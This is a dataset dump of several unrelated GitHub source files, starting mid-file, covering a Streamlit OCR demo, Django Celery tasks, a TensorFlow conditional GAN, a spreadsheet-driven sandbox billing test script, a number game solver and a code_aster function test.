\".join(FILE_TYPES))\n return\n # get data from images\n\n\n\n # once both files uploaded\n if page1 and page2:\n show_page1.image(page1.read())\n show_page2.image(page2.read())\n # get names and extensions\n input1_filename = page1.name\n input1_ext = input1_filename[input1_filename.rindex('.')+1:]\n input2_filename = page2.name\n input2_ext = input2_filename[input2_filename.rindex('.')+1:]\n\n last_name = last_name_input.lower()\n\n # images new file names\n filename_page_1 = last_name + '_page1.' + input1_ext\n filename_page_2 = last_name + '_page2.' + input2_ext\n\n # binarized images new file names\n filename_bin_page_1 = last_name + '_bin_' + str(threshold_input) + '_page1.' + input1_ext\n filename_bin_page_2 = last_name + '_bin_' + str(threshold_input) + '_page2.' 
+ input2_ext\n # filename_bin_page_1=$name$bin$thresh$page1$extension\n # filename_bin_page_2=$name$bin$thresh$page2$extension\n\n # txt filename\n txt_filename = last_name + '_bin_' + str(threshold_input) + '.txt'\n #txt_filename=$name$bin$thresh$txt\n\n # json file name\n json_filename = last_name + '_bin_' + str(threshold_input) + '.json'\n\n # open and save images to file structure\n page1_img = Image.open(page1)\n page2_img = Image.open(page2)\n\n SAVE_PATH = './data/images/'\n\n page1_img.save(SAVE_PATH + filename_page_1)\n page2_img.save(SAVE_PATH + filename_page_2)\n\n\n\n # page1.close()\n # page2.close()\n # if show:\n # page_1_image_show = Image.open(SAVE_PATH + filename_page_1)\n # page_2_image_show = Image.open(SAVE_PATH + filename_page_1)\n # show_page1.image(page_1_image_show)\n # show_page2.image(page_2_image_show)\n # # show_page1.image(page1.read())\n # # show_page2.image(page2.read())\n\n ### binarize\n with st.spinner('Preprocessing OER image'):\n sys.argv = [\"binarize_images.py\", str(threshold_input), filename_page_1, filename_page_2]\n # os.system('python binarize_images 150' + page1_name + ' ' + page2_name)\n binarize_images.main()\n\n\n ### img to text\n with st.spinner('Reading text from image...'):\n sys.argv = [\"img_to_text.py\", filename_bin_page_1, filename_bin_page_2]\n img_to_text.main()\n\n ### parse\n with st.spinner('Converting text to machine-readable format...'):\n sys.argv = [\"parse.py\", txt_filename, filename_bin_page_2]\n parse.main()\n st.success('Conversion complete!')\n\n\n st.write('## Output')\n\n with open('./data/output/' + json_filename, 'r') as f:\n output = json.load(f)\n st.write(output)\n\n\n\n\n\n\n\n\n\n\n\nmain()\n\n\n# if uploaded_file == None:\n# st.warning('Please upload pdf resume for the demo')\n# st.stop()\n# else:\n# if isinstance(file, BytesIO):\n# return FileType.IMAGE\n# = uploaded_pdf_to_text(uploaded_file)\n#\n# show_file.image(file)\n#\n#\n#\n#\n# file_option = st.selectbox('txt or pdf resume?', ['Select one', '.txt', '.pdf', 'upload my own pdf'])\n# #### text options\n# if file_option == 'Select one':\n# st.warning('Please select a .txt or .pdf example resume or upload your own pdf')\n# st.stop()\n#\n# elif file_option == '.txt':\n# option = st.selectbox('which .txt resume would you like to use?',\n# ('Select one', 'Accounting', 'Data_Scientist', 'Logistics', 'Manufacturing_Engineer', 'Marketing', 'Nurse', 'Security_Guard', 'Software_Developer', 'Waitress'))\n# if option == 'Select one':\n# st.warning('Please select an example pdf resume for the demo')\n# st.stop()\n# text_lookup_res = load_from_txt(option.lower())\n#\n# ### pdf options\n# elif file_option == '.pdf':\n# option = st.selectbox('which pdf resume would you like to use?',\n# ('Select one', 'Accountant', 'Auditor', 'Banking_Analyst', 'Business_Associate', 'Compliance', 'Investment_Banking', 'Investor_Relations', 'Office_Manager', 'Paralegal'))\n# if option == 'Select one':\n# st.warning('Please select an example pdf resume for the demo')\n# st.stop()\n# pdf_to_text(option.lower())\n# text_lookup_res = load_from_txt(option.lower(), pdf=True)\n#\n# elif file_option == 'upload my own pdf':\n# uploaded_file = st.file_uploader(\"Choose a file\", type='pdf')\n# if uploaded_file == None:\n# st.warning('Please upload pdf resume for the demo')\n# st.stop()\n# else:\n# text_lookup_res = uploaded_pdf_to_text(uploaded_file)\n# option = 'Uploaded'\n#\n# st.write('## {} Resume Text:'.format(option))\n# st.write(text_lookup_res)\n#\n#\n# ### Compute skill topics\n# with 
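The pipeline above drives binarize_images, img_to_text and parse by overwriting sys.argv before calling each module's main(). A minimal sketch of that pattern with the mutation scoped and undone afterwards (run_as_cli is a hypothetical helper, not part of the app):

import sys

def run_as_cli(module, *args):
    # Simulate `python module.py arg1 arg2 ...` for a main() that reads sys.argv.
    saved = sys.argv
    try:
        sys.argv = [module.__name__ + '.py'] + [str(a) for a in args]
        module.main()
    finally:
        sys.argv = saved  # restore so later code sees the real argv

# e.g. run_as_cli(binarize_images, threshold_input, filename_page_1, filename_page_2)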
st.spinner('Computing skills and job matches...'):\n# df = load_df()\n# d2v_model = load_d2v_model()\n# lda_model = load_LDA_model()\n# topic_words_all = load_topic_words()\n# st.success('Computation complete.')\n#\n#\n# section_separator()\n# st.write('## {} Resume Skills:'.format(option))\n# skill_words = 15\n# topic_words = [topic_words_all[i][:skill_words] for i in range(len(topic_words_all))]\n# with st.spinner('Extracting skills from resume...'):\n# res_topics = get_doc_topics(text_lookup_res, lda_model)\n# # st.write('Res topics ' + str(res_topics))\n# # st.write('Ordered res topics ' + str(res_topics_ordered))\n#\n# skills_to_display = st.slider('How many skills do you want to see?', 0, 20, 5)\n# show_skills_and_words(skills_to_display, res_topics)\n#\n#\n#\n# # top_skills = 4\n# # if top_skills > len(res_topics_ordered):\n# # top_skills = len(res_topics_ordered)\n# # for i in range(top_skills):\n# # skill = res_topics_ordered[i][0]\n# # score = res_topics_ordered[i][1]\n# # st.write('Skill #' + str(i+1) + \": \" + str(skill) + ' score: ' + str(score))\n# # st.write('Skill words: ' + str(topic_words[skill]))\n#\n# section_separator()\n# \"\"\"\n# ## Jobs similar to this resume\n# \"\"\"\n# similar_jobs_to_resume = st.slider('# similar jobs to selected resume', 0, 15, 5)\n# predict_jobs(d2v_model, df, text=text_lookup_res, topn=similar_jobs_to_resume)\n#\n#\n# section_separator()\n# \"\"\"\n# ## Search for Jobs Similar to a Selected Job\n# Pick a job number, see that job, you will be shown similar jobs\n# \"\"\"\n# job_num = int(st.text_input(label=\"Enter a Job ID between 0 and 22000\", value=\"-1\"), 10)\n# if job_num == -1:\n# st.warning('No job ID selected for search')\n# st.stop()\n#\n# similar_jobs_to_job = st.slider('# similar jobs to selected job', 0, 10, 5)\n#\n# st.write('#### Showing similar jobs to this one')\n# print_job_info(job_num)\n#\n# # show similar jobs\n# text_lookup_job = df.iloc[job_num]['job_description']\n# predict_jobs(d2v_model, df, text=text_lookup_job, topn=similar_jobs_to_job)\n#\n#\n# section_separator()\n# \"\"\"\n# ## Here's the data behind this demo\n# \"\"\"\n# short = df[:10000]\n# st.write(short)\n","repo_name":"rskuzma/OER_demo","sub_path":"oer_demo.py","file_name":"oer_demo.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4885396988","text":"from celery import shared_task\nfrom .models import Raca, Cachorro\n\n\n\n@shared_task()\ndef adicionar_raca(nome, cores, pais, tamanho, descricao):\n raca = Raca(nome=nome, cores=cores, pais=pais, tamanho=tamanho, descricao=descricao)\n raca.save()\n print('A raça foi adicionada com sucesso!')\n \n@shared_task()\ndef adicionar_cachorro(nome, peso, altura, sexo, descricao, personalidade, raca_id):\n raca = Raca.objects.get(id=raca_id)\n cachorro = Cachorro(nome=nome, peso=peso, altura=altura, sexo=sexo, descricao=descricao, personalidade=personalidade, raca=raca)\n cachorro.save()\n print('O cachorro foi adicionado com sucesso!')\n\n@shared_task()\ndef excluir_raca(raca_id):\n Raca.objects.get(id=raca_id).delete()\n print('A raça foi excluida com sucesso!')\n\n@shared_task()\ndef excluir_cachorro(cachorro_id):\n Cachorro.objects.get(id=cachorro_id).delete()\n print('O cachorro foi excluido com 
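For context on the Celery tasks defined above: with a configured broker they would normally be queued asynchronously via .delay() rather than called directly. The argument values below are made up for illustration:

# Hypothetical producer-side calls; each returns immediately and a
# worker executes the task in the background.
adicionar_raca.delay('Labrador', 'amarelo, preto', 'Canada', 'grande', 'Docil e ativo')
adicionar_cachorro.delay('Rex', 30, 60, 'M', 'Muito docil', 'Brincalhao', raca_id=1)
excluir_cachorro.delay(cachorro_id=7)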
sucesso!')\n","repo_name":"AndreRamos-py/VINDOG","sub_path":"Vindog/racas/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8928566605","text":"\"\"\" Conditional Generative Adversarial Network.\n\nThis is in fact the Least-Squares CGAN, as I found it\nyields best results so far. However, the GAN market\nis developing rapidly.\n\"\"\"\nimport sys\nimport time\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nimport tensorflow as tf\n\nfrom neural_networks import nn\n\n\nclass SkeletonNN(nn.NN):\n __doc__ = \"\"\" A neural net skeleton.\n \n Used by the GAN class to create neural net graphs. \"\"\"\n __doc__ += nn.NN.__doc__\n\n def __init__(self, x_tf, dropout_tf, **kwargs):\n #super().__init__(x_tf=x_tf, dropout_tf=dropout_tf,**kwargs)\n nn.NN.__init__(self, x_tf=x_tf, dropout_tf=dropout_tf, **kwargs)\n\n def define_loss(self):\n return None\n\n def define_training(self):\n return None\n\n def define_scalers(self):\n return None, None\n\n def predict(self):\n pass\n\n def fit(self):\n pass\n\n\nclass CGAN(object):\n \"\"\" A Least-Squares CGAN.\n\n Args:\n x_dim (int): Data dimensionality.\n cond_dim (int): Conditioning data dimensionality.\n noise_dim (int): Generator random input dimensionality.\n g_arch ([int, int]): Generator architecture.\n g_ntype (str): Generator net type (see neural_networks.nn).\n d_arch ([int, int]): Discriminator architecture.\n d_ntype (str): Discriminator net type (see neural_networks.nn).\n \"\"\"\n def __init__(self, x_dim, cond_dim, noise_dim, g_arch=[128, 128],\n g_ntype='plain', d_arch=[128, 128], d_ntype='plain', **kwargs):\n # Bookkeeping.\n self.x_dim = x_dim\n self.cond_dim = cond_dim\n self.noise_dim = noise_dim\n self.x_tf = tf.placeholder(\n tf.float32, [None, x_dim], name='x_input')\n self.cond_tf = tf.placeholder(\n tf.float32, [None, cond_dim], name='cond_input')\n self.z_tf = tf.placeholder(\n tf.float32, [None, noise_dim], name='z_input')\n self.lr_tf = tf.placeholder(\n tf.float32, name='learning_rate')\n self.dropout_tf = tf.placeholder(\n tf.float32, name='dropout')\n self.g_arch = g_arch\n self.g_ntype = g_ntype\n self.d_arch = d_arch\n self.d_ntype = d_ntype\n \n # Define the Generator, Discriminator, and their losses.\n self.y_from_x, self.y_from_z, self.x_from_z =\\\n self.define_gan()\n with tf.variable_scope('g_loss'):\n self.g_loss_tf = self.define_gloss()\n self.g_train_tf = self.define_gtrain()\n with tf.variable_scope('d_loss'):\n self.d_loss_tf = self.define_dloss()\n self.d_train_tf = self.define_dtrain()\n\n # Define the data scalers.\n self.scaler_x, self.scaler_cond = self.define_scalers()\n\n def define_scalers(self):\n \"\"\" Use the MinMax scaler, as generator will have tanh outputs. 
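To make the scaler choice concrete (a standalone sketch; the values are illustrative): MinMaxScaler with feature_range=(-1, 1) maps real data into the generator's tanh output range, and inverse_transform maps generated samples back to data units.

import numpy as np
from sklearn.preprocessing import MinMaxScaler

scaler = MinMaxScaler(feature_range=(-1, 1))
x = np.array([[0.0], [5.0], [10.0]])
x_scaled = scaler.fit_transform(x)            # [[-1.], [0.], [1.]]
x_back = scaler.inverse_transform(x_scaled)   # recovers the original units
assert np.allclose(x, x_back)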
\"\"\"\n return (MinMaxScaler(feature_range=(-1, 1)),\n MinMaxScaler(feature_range=(-1, 1)))\n\n def define_gan(self):\n with tf.variable_scope('generator'):\n gen_net = SkeletonNN(x_dim=self.cond_dim + self.noise_dim,\n y_dim=self.x_dim, arch=self.g_arch, ntype=self.g_ntype,\n x_tf=tf.concat([self.cond_tf, self.z_tf], axis=1),\n dropout_tf=self.dropout_tf)\n x_from_z = tf.nn.tanh(gen_net.y_pred)\n with tf.variable_scope('discriminator') as scope:\n disc_net = SkeletonNN(x_dim=self.cond_dim + self.x_dim,\n y_dim=1, arch=self.d_arch, ntype=self.d_ntype,\n x_tf=tf.concat([self.cond_tf, self.x_tf], axis=1),\n dropout_tf=self.dropout_tf)\n y_from_x = disc_net.y_pred\n scope.reuse_variables()\n y_from_z = SkeletonNN(x_dim=self.cond_dim + self.x_dim,\n y_dim=1, arch=self.d_arch, ntype=self.d_ntype,\n x_tf=tf.concat([self.cond_tf, x_from_z], axis=1),\n dropout_tf=self.dropout_tf).y_pred\n return y_from_x, y_from_z, x_from_z\n\n def define_gloss(self):\n return .5 * tf.reduce_mean(tf.pow(self.y_from_z - 1, 2))\n\n def define_gtrain(self):\n all_vars = tf.trainable_variables()\n var_list = [v for v in all_vars if v.name.startswith('generator/')]\n return tf.train.AdamOptimizer(self.lr_tf).minimize(\n self.g_loss_tf, var_list=var_list)\n\n def define_dloss(self, flip=False):\n return .5 * (tf.reduce_mean(tf.pow(self.y_from_x - 1, 2)\n + tf.pow(self.y_from_z, 2)))\n\n def define_dtrain(self):\n all_vars = tf.trainable_variables()\n var_list = [v for v in all_vars if v.name.startswith('discriminator/')]\n return tf.train.AdamOptimizer(self.lr_tf).minimize(\n self.d_loss_tf, var_list=var_list)\n\n def fit(self, x, cond, sess, epochs=1000, batch_size=32, lr=1e-3,\n n_diters=100, nn_verbose=True, **kwargs):\n start_time = time.time()\n batch_size = min(batch_size, x.shape[0])\n x = self.scaler_x.fit_transform(x)\n cond = self.scaler_cond.fit_transform(cond)\n\n for epoch in range(epochs):\n # Train the discriminator.\n for k in range(n_diters):\n x_ids = np.random.choice(x.shape[0], batch_size)\n feed_dict = {self.x_tf: x[x_ids],\n self.cond_tf: cond[x_ids],\n self.z_tf: self.sample_noise(batch_size),\n self.dropout_tf: 1.,\n self.lr_tf: lr}\n _, dloss = sess.run([self.d_train_tf, self.d_loss_tf],\n feed_dict)\n\n # Train the generator.\n z_noise = self.sample_noise(batch_size)\n x_ids = np.random.choice(x.shape[0], batch_size)\n feed_dict = {self.z_tf: self.sample_noise(batch_size),\n self.cond_tf: cond[x_ids],\n self.lr_tf: lr,\n self.dropout_tf: 1.}\n _, gloss = sess.run([self.g_train_tf, self.g_loss_tf], feed_dict)\n\n # Bookkeeping.\n tr_time = time.time() - start_time\n if nn_verbose:\n sys.stdout.write(('\\rTraining epoch {}, time {}s. '\n 'Discriminator loss {:.4g}. 
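The two losses defined above are the least-squares GAN objectives: the discriminator pushes real scores toward 1 and fake scores toward 0, while the generator pushes fake scores toward 1. A NumPy restatement for reference:

import numpy as np

def d_loss(d_real, d_fake):
    return 0.5 * np.mean((d_real - 1.0) ** 2 + d_fake ** 2)

def g_loss(d_fake):
    return 0.5 * np.mean((d_fake - 1.0) ** 2)

assert d_loss(np.ones(4), np.zeros(4)) == 0.0  # perfect discriminator
assert g_loss(np.ones(4)) == 0.0               # generator fully fools D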
'\n 'Generator loss {:.4g}.').format(\n epoch, int(tr_time), dloss, gloss))\n sys.stdout.flush()\n\n def sample(self, n_samples, cond, sess):\n \"\"\" Sample from the distribution defined by the generator.\n\n Args:\n n_samples (int): Number of samples to create *per each cond data*.\n cond (n_data, cond_dim): Conditioning data.\n sess: Tensorflow session.\n\n Returns:\n samples (n_data, n_samples, x_dim): Samples defined by the\n generator's distribution.\n \"\"\"\n cond = self.scaler_cond.transform(cond)\n res = np.zeros((cond.shape[0], n_samples, self.x_dim))\n for cond_id, cond_data in enumerate(cond):\n z_noise = self.sample_noise(n_samples)\n feed_dict = {self.z_tf: z_noise,\n self.cond_tf: np.array([cond_data] * n_samples),\n self.dropout_tf: 1.}\n x = sess.run(self.x_from_z, feed_dict)\n res[cond_id] = self.scaler_x.inverse_transform(x)\n return res\n\n def sample_noise(self, n_samples):\n \"\"\" Sample inputs to the generator.\n\n Args:\n n_samples (int): Number of noise-samples.\n\n Returns:\n noise (n_samples, self.noise_dim): Noise samples.\n \"\"\"\n return np.random.randn(n_samples, self.noise_dim)\n\n\nif __name__==\"__main__\":\n from tensorflow.examples.tutorials.mnist import input_data\n import matplotlib.pyplot as plt\n n_samples = 10000\n kwargs = {\n 'epochs': 10000,\n 'g_arch': [32]*10,\n 'g_ntype': 'plain',\n 'd_arch': [32]*10,\n 'd_ntype': 'plain',\n 'n_diters': 10,\n 'lr': 1e-4,\n 'noise_dim': 10,\n 'batch_size': 32,\n }\n # Make test data: a noisy mix of functions sampled with different probs.\n cond = np.linspace(-1, 1, n_samples ).reshape(-1, 1)\n x1 = cond**2 + np.random.randn(*cond.shape) * .3\n x2 = -cond/2-1 + np.random.randn(*cond.shape) * .1\n x3 = -cond-2 + np.random.randn(*cond.shape) * .1\n x4 = cond-3 + np.random.randn(*cond.shape) * .1\n x = np.hstack([x1, x2, x3, x4])\n ids = np.random.choice(4, x.shape[0], p=[.7, .1, .1, .1])\n x = cond + x[np.arange(x.shape[0]), ids].reshape(-1, 1)\n\n cgan = CGAN(x_dim=x.shape[1], cond_dim=cond.shape[1], **kwargs)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # Use a writer object for Tensorboard.\n summary = tf.summary.merge_all()\n writer = tf.summary.FileWriter('logs/{}'.format('gan'))\n writer.add_graph(sess.graph)\n\n # Fit the net.\n cgan.fit(x=x, cond=cond, sess=sess, nn_verbose=True, **kwargs)\n\n # Generate some samples.\n samples = cgan.sample(n_samples=1, cond=cond, sess=sess)\n\n plt.figure(figsize=(20, 10))\n plt.subplot(1, 2, 1)\n plt.title('Samples real data.')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.ylim([x.min(), x.max()])\n plt.plot(cond, x, 'k.', alpha=.2)\n\n plt.subplot(1, 2, 2)\n plt.title('CGAN samples.')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.ylim([x.min(), x.max()])\n plt.plot(cond, np.squeeze(samples), 'k.')\n\n plt.show()\n","repo_name":"kjchalup/neural_networks","sub_path":"neural_networks/cgan.py","file_name":"cgan.py","file_ext":"py","file_size_in_byte":9712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"24259048676","text":"import requests\nimport pandas as pd\nimport sys\nimport os\nimport random\nimport time\nfrom datetime import datetime\n\n# 젠킨스 사용 시 활성화 시킬 것\n# sys.path.append(os.environ['WORKSPACE']) # jenkins\n\nfrom model.data.GoogleDriveAPIAuth import GoogleAPIAuth\nfrom model.data.VariableSet import VariableSet\n\n\n# 스프레드시트 데이터 가져오기\nvs = VariableSet()\ngd = GoogleAPIAuth()\ndoc = gd.gc.open_by_url(vs.spreadsheet_url)\nws = doc.worksheet('소재정보')\n# doc = 
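A small variant of the worksheet ingestion above: passing the header row to pandas gives named columns, so later look-ups can read by label instead of position (a minimal sketch, using ws as fetched above):

import pandas as pd

values = ws.get_all_values()          # list of rows, first row is the header
header, rows = values[0], values[1:]
df = pd.DataFrame(rows, columns=header)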
gd.gc.open_by_url(vs.spreadsheet_test)\n# ws = doc.worksheet('시트1')\nvalues = ws.get_all_values()\n\n# 시작할 행 숫자 입력\nstartrow = 2\n\n# 헤더와 데이터 테이블 범위 지정\nheader, rows = values[0], values[startrow - 1:]\nexcel_source = pd.DataFrame(rows)\nprint(\"소재 개수: \" + str(len(excel_source)) + \"개\")\n# print(excel_source)\n\n# 초기 변수 선언\nresults = []\ni = startrow\nj = 0\nnumber = len(excel_source)\ndt = datetime.fromtimestamp(time.time())\ndate = '빌드날짜 : ' + str(dt)[:16]\n\ndef get_excel_source(row):\n # 노출/클릭수량 관련 랜덤값 설정\n rainta = 100 # raintb보다 항상 작게\n raintb = 10000\n diva = 10 # divb보다 항상 작게\n divb = 100\n\n # # API 고정 변수 지정\n # 건당 과금금액\n chargeAmount_CPM = random.randint(1,3)\n chargeAmount = random.randint(50,300)\n # 서버 환경. 샌박 Only 지원으로 건들지 말 것\n profileServer = 'SANDBOX'\n # 과금 방식. CPMS/CPT, 스폰서드 미지원\n spendingMethod_CPM = 'CPM'\n spendingMethod = 'CPC'\n # 테스트 회차\n testDegree = 1\n\n # 광고계정 ~ 소재ID 추출\n walletId = excel_source[0][row]\n campaignId = excel_source[1][row]\n adGroupId = excel_source[2][row]\n representativeId = excel_source[3][row]\n spendingMethod_org = excel_source[4][row]\n\n if spendingMethod_org == 'CPM':\n chargeAmount = 0\n elif spendingMethod_org == 'CPA':\n spendingMethod = spendingMethod_org\n chargeAmount_CPM = 0\n chargeAmount = 1500\n elif spendingMethod_org == 'CPC':\n chargeAmount_CPM = 0\n elif spendingMethod_org == 'CPV':\n spendingMethod = spendingMethod_org\n chargeAmount_CPM = 0\n chargeAmount = 20\n elif spendingMethod_org == '자동':\n randomAmount = random.choice([0, int(chargeAmount)])\n if randomAmount == 0:\n chargeAmount = randomAmount\n else:\n chargeAmount = 0\n else:\n chargeAmount_CPM = 0\n chargeAmount = 0\n\n # 발송 건수\n msgCount_CPM = random.randint(rainta, raintb)\n a = random.randint(diva, divb)\n msgCount = int(msgCount_CPM / a)\n\n # 건별 과금 발송 (API Request)\n server = '{서버주소}'\n path = '{URI}'\n params_CPM = {'walletId': walletId, 'adGroupId': adGroupId, 'campaignId': campaignId,\n 'representativeId': representativeId, 'chargeAmount': chargeAmount_CPM, 'msgCount': msgCount_CPM,\n 'profile': profileServer, 'spendingMethod': spendingMethod_CPM, 'testDegree': testDegree}\n time.sleep(1)\n params = {'walletId': walletId, 'adGroupId': adGroupId, 'campaignId': campaignId,\n 'representativeId': representativeId, 'chargeAmount': chargeAmount, 'msgCount': msgCount,\n 'profile': profileServer, 'spendingMethod': spendingMethod, 'testDegree': testDegree}\n url = server + path\n\n # 응답결과 추출\n response_CPM = requests.post(url, params=params_CPM)\n response = requests.post(url, params=params)\n results.append(\n (representativeId, spendingMethod_CPM, chargeAmount_CPM, msgCount_CPM, response_CPM.status_code, spendingMethod,\n chargeAmount, msgCount, response.status_code))\n\n return results\n\n# 데이터가 100개가 넘을 경우 100개 단위로 결과값 입력\nwhile number >= 100:\n for data in range(100):\n api_response = get_excel_source(j)\n i += 1\n j += 1\n number -= 1\n time.sleep(1)\n\n # 스프레드시트에 결과값 일괄 입력\n print(\"[[\" + str(j) + \"번째 과금 완료]]\")\n ws.update('G' + str(startrow), results)\n\nmidrow = j\n\n# 리스트 초기화\nresults = []\n\nprint(\"[[마지막 소재 개수: \" + str(len(excel_source) - j) + \"]]\")\nfor data in range(len(excel_source) - j):\n api_response = get_excel_source(j)\n i += 1\n j += 1\n time.sleep(1)\n\n# 스프레드시트에 결과값 일괄 입력\nws.update('G' + str(startrow + midrow), results)\n\n# 스프레드시트에 빌드날짜 입력\nws.update('P1', date)\n\nprint(\"[[\" + str(j) + \"번째 과금 
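The 100-row batching above can be factored into a reusable helper so the flush-every-chunk logic is written once (flush_in_chunks is hypothetical; ws.update would be the flush callback here):

def flush_in_chunks(rows, flush, chunk_size=100):
    buffer = []
    for row in rows:
        buffer.append(row)
        if len(buffer) == chunk_size:
            flush(buffer)  # e.g. one ws.update(...) call per chunk
            buffer = []    # reassign rather than clear(), so flushed lists survive
    if buffer:
        flush(buffer)      # trailing partial chunk

collected = []
flush_in_chunks(range(250), collected.append)
assert [len(c) for c in collected] == [100, 100, 50]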
완료]]\")","repo_name":"alvinshin81/alvinshin","sub_path":"usefulScripts/createMetricData_usingAPI.py","file_name":"createMetricData_usingAPI.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42457477025","text":"class GameSolution:\n def __init__(self, max_value):\n self.__max_value = max_value\n self.__hugo_string = \"hugo\"\n\n def get_all_solutions(self, numbers):\n \"\"\"\n get_all_solutions(numbers) -> Dictionary\n Calculates the solution for the numbers for the game HUGO. The result is returned as a dictionary. The\n key is the counter of the game and the value is the solution.\n\n @param numbers A list of numbers, for which the solution should be calculated.\n \"\"\"\n numbers_to_play_with = []\n solution = {}\n\n for number in numbers:\n numbers_to_play_with.extend(self.__get_solution_for_number(number))\n\n numbers_to_play_with.sort()\n numbers_to_play_with = list(set(numbers_to_play_with))\n\n for val in range(1, self.__max_value + 1):\n if numbers_to_play_with.__contains__(val):\n solution[val] = self.__hugo_string\n else:\n solution[val] = str(val)\n\n return solution\n\n def __get_solution_for_number(self, number):\n hugo_numbers = []\n\n try:\n int(number)\n\n # string of value\n string_row = str(number)\n for val in range(1, self.__max_value + 1):\n hugo_numbers.append(val * number)\n\n # row with number in it\n if string_row not in str(val):\n continue\n else:\n hugo_numbers.append(val)\n\n except ValueError:\n print(\"No number recognized\")\n\n return hugo_numbers\n","repo_name":"iarava/HSLU-ROBLAB-Hugo","sub_path":"logic/gameSolution.py","file_name":"gameSolution.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20346938551","text":"from math import sin, pi\nimport numpy as np\n\nimport code_aster\nfrom code_aster.Commands import *\n\ncode_aster.init(\"--test\", ERREUR=_F(ALARME=\"EXCEPTION\"))\n\ntest = code_aster.TestCase()\n\nfsin = code_aster.Function()\nfsin.setParameterName(\"INST\")\nfsin.setResultName(\"TEMP\")\nfsin.setInterpolation(\"LIN LIN\")\ntest.assertEqual(fsin.getType(), \"FONCTION_SDASTER\", msg=\"fsin: check type\")\n\nwith test.assertRaises(RuntimeError, msg=\"fsin: interp type\"):\n fsin.setInterpolation(\"invalid\")\n\nfsin.setExtrapolation(\"CC\")\n\n# check properties assignment\nprop = fsin.getProperties()\ntest.assertEqual(prop[1:5], [\"LIN LIN\", \"INST\", \"TEMP\", \"CC\"], msg=\"fsin: properties\")\n\n# values assignment\nn = 12\nvalx = np.arange(n) * 2.0 * pi / n\nvaly = np.zeros(n)\n\n# sizes checking\nfsin.setValues(valx, valy)\nwith test.assertRaisesRegex(RuntimeError, \"length.*be equal\"):\n fsin.setValues(valx, [0.0, 1.0])\nwith test.assertRaisesRegex(RuntimeError, \"function size is\"):\n fsin.setValues([0.0, 1.0], [0.0, 1.0])\n\n# assign correct values\nvaly = np.sin(valx) * -1.0\nfsin.setValues(valx, valy)\n\n# fsin.debugPrint(6)\n\ntest.assertAlmostEqual(fsin(pi / 2.0), -1.0, msg=\"fsin(pi/2)\")\n\n# check Function.abs()\nfabs = fsin.abs()\narrabs = fabs.getValuesAsArray()\ntest.assertTrue(np.alltrue(arrabs[:, 1] >= 0.0), msg=\"fsin: abs values\")\ntest.assertAlmostEqual(fabs(pi / 2.0), 1.0, msg=\"fabs(pi/2)\")\n\nvalues = fsin.getValuesAsArray()\ntest.assertEqual(values.shape, (n, 2), msg=\"fsin: shape\")\n\n# complex\nfcmpl = 
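Returning to the GameSolution class above, a short worked example (the inputs are illustrative): for the number 7 with max_value 30, every multiple of 7 and every value containing the digit 7 maps to "hugo".

gs = GameSolution(max_value=30)
solution = gs.get_all_solutions([7])

assert solution[14] == 'hugo'  # multiple of 7
assert solution[17] == 'hugo'  # contains the digit 7
assert solution[8] == '8'      # untouched values come back as strings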
code_aster.FunctionComplex()\nfcmpl.setParameterName(\"INST\")\nfcmpl.setResultName(\"TEMP\")\nfcmpl.setInterpolation(\"LIN LIN\")\ntest.assertEqual(fcmpl.getType(), \"FONCTION_C\", msg=\"fcmpl: type\")\n\nvalz = np.zeros(2 * n)\nfcmpl.setValues(valx, valz)\n\nwith test.assertRaisesRegex(RuntimeError, \"length.*ordinates.*twice.*absc\"):\n fcmpl.setValues(valx, [0.0, 1.0])\nwith test.assertRaisesRegex(RuntimeError, \"function size is\"):\n fcmpl.setValues([0.0, 1.0], [0.0, 1.0, 0.1, 1.2])\n\nvalz = np.vstack([valy, valy]).transpose().ravel()\nfcmpl.setValues(valx, valz)\n\ntest.assertAlmostEqual(fcmpl(pi / 2.0), -1.0 - 1.0j, msg=\"fcmpl(pi/2)\")\n\nDF1 = DEFI_FONCTION(\n NOM_PARA=\"INST\",\n NOM_RESU=\"DEPL\",\n VERIF=\"CROISSANT\",\n PROL_DROITE=\"LINEAIRE\",\n ABSCISSE=(0.0, 1.0, 2.0),\n ORDONNEE=(0.0, 1.0, 3.0),\n)\n\nDF2 = DEFI_FONCTION(\n NOM_PARA=\"INST\",\n NOM_RESU=\"DEPL\",\n INTERPOL=\"LOG\",\n PROL_GAUCHE=\"LINEAIRE\",\n VALE=(3.0, 3.0, 4.0, 4.0, 5.0, 5.0),\n)\n# DF1.debugPrint()\n\nDN1 = DEFI_NAPPE(\n NOM_PARA=\"AMOR\",\n NOM_RESU=\"ACCE\",\n VERIF=\"CROISSANT\",\n INTERPOL=\"LOG\",\n PROL_DROITE=\"CONSTANT\",\n PROL_GAUCHE=\"CONSTANT\",\n PARA=(0.01, 0.02),\n FONCTION=(DF1, DF2),\n)\n\nvalues2 = DN1.getValues()\nnbv2 = len(values2[1]) // 2\ntest.assertEqual(values2[1][nbv2:], [3.0, 4.0, 5.0], msg=\"DN1: values\")\n\nparameters = DN1.getParameters()\ntest.assertEqual(parameters, [0.01, 0.02], msg=\"DN1: parameters\")\n\n# DN1.debugPrint()\ntest.printSummary()\n\nFIN()\n","repo_name":"Krande/code-aster-copy","sub_path":"astest/func01a.py","file_name":"func01a.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24948049135","text":"from collections import namedtuple\n\nPoint = namedtuple('Point',['straight','left','right'])\n\nNetwork = {'A':Point('D','E','F'), 'B':Point('C','G','H'), 'C':Point('B','I','J'),\n 'D':Point('A','K','L'), 'E':Point('A','M','N'), 'F':Point('A','N','O'),\n 'G':Point('B','O','P'), 'H':Point('B','P','Q'), 